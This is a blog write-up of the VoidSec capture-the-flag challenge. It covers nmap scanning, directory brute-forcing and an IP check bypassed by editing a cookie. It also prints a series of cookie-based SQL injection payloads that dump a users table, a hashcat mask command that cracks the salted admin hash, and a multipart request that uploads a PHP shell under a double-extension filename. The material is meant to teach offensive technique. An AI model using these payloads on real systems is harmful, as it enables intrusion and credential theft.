[CTF] VoidSec CTF

I’m sorry for the big delay but I was full of exams in this period and I didn’t have time to write post in my blog. Today I want to show you the writeup of an awesome CTF: http://ctf.voidsec.com.

Information Gathering

First of all I launched a scan with nmap:

nmap ctf.voidsec.com -sS -p 1-65535

After some time (a lot of time) I found the open ports:

PORT      STATE    SERVICE 
22/tcp    open     ssh 
54/tcp    filtered xns-ch 
111/tcp   open     rpcbind 
8332/tcp  filtered unknown 
8333/tcp  filtered bitcoin 
9332/tcp  filtered unknown 
9333/tcp  filtered litecoin 
9987/tcp  filtered dsm-scm-target 
51065/tcp open     unknown 
62222/tcp open     unknown 
65324/tcp open     unknown

I tried to browse to http://ctf.voidsec.com:65324 and I realized that I found the http port. I clicked on the big START button wich showed me a popup which said:

Back in my days I used to start with a bit of healthy Information Gathering

Ok, let’s do this information gathering.
First of all I bruteforced directories and files with directory-list-2.3-medium.txt dirbuster wordlist and I found /backup-recovery folder. Directory listing was active and I downloaded the only file which was inside it (userlist.bak). Also I found the /include folder and bruteforcing files I found config.php.bak which contained an hash salt: 3f42

At the end I took a look into robots.txt and I found the admin login portal directory: /eLprZw6c. When I tried to access it I got an error 403:

Error 403 - Forbidden

This interface is only accessible from: 144.11.32.239

Your IP Address: 79.30.175.53

To bypass this I changed the admin_ip cookie value to 144.11.32.239.

Bruteforcing is your friend

I moved to registration page (http://ctf.voidsec.com:65324/register.php) and I noticed that I could choose an username and the page noticed me if the username was already taken or not. So I intercepted the request (it was an AJAX one) with Burpsuite and I bruteforced the usernames with the .bak file previously downloaded. At the end I found only one username: sukumar. Then I bruteforced the password with Burpsuite from the login form and I found trustno1.

Cookie Injection

Now that I am logged in as sukumar I explored the page, there was a dashboard with a disabled comments section, I tried to enable it but it was not the right path. Then I found a new cookie, secure_club:

c3VrdW1hcjpOeklnTmpVZ05tUWdOalVnTm1RZ05qSWdOalVnTnpJZ05XWWdObVFnTmpVPTowOjE0ODY4OTkwNTE%3D

I decoded it from URL and then from base64 and I found this:

sukumar:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Then I tested if the cookie was vulnerable to SQL Injection:

sukumar' OR 1=1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I re-encoded it and I refreshed the page. Now the username sukumar, which was on the top-left menu, was replaced by Without pain so I can exploit the SQLi. First of all I found the number of columns:

sukumar' GROUP BY 1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 2#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 3#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 4#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 6#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Until GROUP BY 5 the page was rendered correctly but when I tried with 6 columns the username and email were blank, so I supposed that the query return only 5 columns. Now I found the vulnerable columns:

s' UNION ALL SELECT 1,2,3,4,5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

On the page number 2 and 5 were displayed so I can use these two columns to dump the database:

s' UNION ALL SELECT 1,database(),3,4,user()#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I got this:

ctf
ctf_user@localhost

Now I found table names:

s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

So, the tables are:

comments
users
usersonline

The table users was the one which interested me, so I discovered the column names:

s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 3,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 4,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

The columns of table users are:

id
username
type
password
mail

Now dump the admin email:

s' UNION ALL SELECT 1,CONCAT(username, '~', password, '~', mail),3,4,5 FROM users LIMIT 9,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

This is the output:

tyler~b9e45646f4d582b700c59c0211eedc6c~tylerdurden@mayhem.com

Ok, now I need to crack the hash. With hash-identifier I found that it could be MD5($salt.$pass), so I created a file with the hash and the salt:

b9e45646f4d582b700c59c0211eedc6c:3f42

Also, clicking on “Forgot your password?” on admin portal login I found the password rules:

Remember, your new password must:

- start with _
- use only this charset [a-z][A-Z][0-9]
- be max 8 char length

So i performed a mask attack with hashcat:

optirun hashcat -a 3 -m 20 -1 _ -2 ?l?u?d ?1?2?2?2?2?2?2?2 hash.txt

After some minutes I found the password: _Kr4K3n0.

Give me a reverse shell!

Now that I am logged in with the admin credentials I found an upload form on the settings menu on the top-right of the dashboard. It accepts only .xml files but I tried to upload a PHP shell:

POST /eLprZw6c/upload.php HTTP/1.1
Host: ctf.voidsec.com:65324
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ctf.voidsec.com:65324/eLprZw6c/settings.php
Cookie: __cfduid=df50c6365654161b804e8cbafbfbd1ccc1486652943; __utma=225611421.1379856735.1486652948.1486652948.1486850440.2; __utmz=225611421.1486652948.1.1.utmcsr=ctf.voidsec.com:65324|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; secure_club=cycgVU5JT04gQUxMIFNFTEVDVCAxLENPTkNBVCh1c2VybmFtZSwgJ34nLCBwYXNzd29yZCwgJ34nLCBtYWlsKSwzLDQsNSBGUk9NIHVzZXJzIExJTUlUIDksMSM6TnpJZ05qVWdObVFnTmpVZ05tUWdOaklnTmpVZ056SWdOV1lnTm1RZ05qVT06MDoxNDg2ODk5MDUx; admin_ip=144.11.32.239; PHPSESSID=tqo38cmsghq0q2msd1to1sp115
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------178431310316686449931498616622
Content-Length: 250

-----------------------------178431310316686449931498616622
Content-Disposition: form-data; name="file"; filename="shell.php;.xml"
Content-Type: text/xml



-----------------------------178431310316686449931498616622--

After upload the “XML” was processed and I got the reverse shell on my box! Then I browsed to /zCTF-END-HERE and I red END.txt file.
CTF completed!

Advertisements
[CTF] VoidSec CTF

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s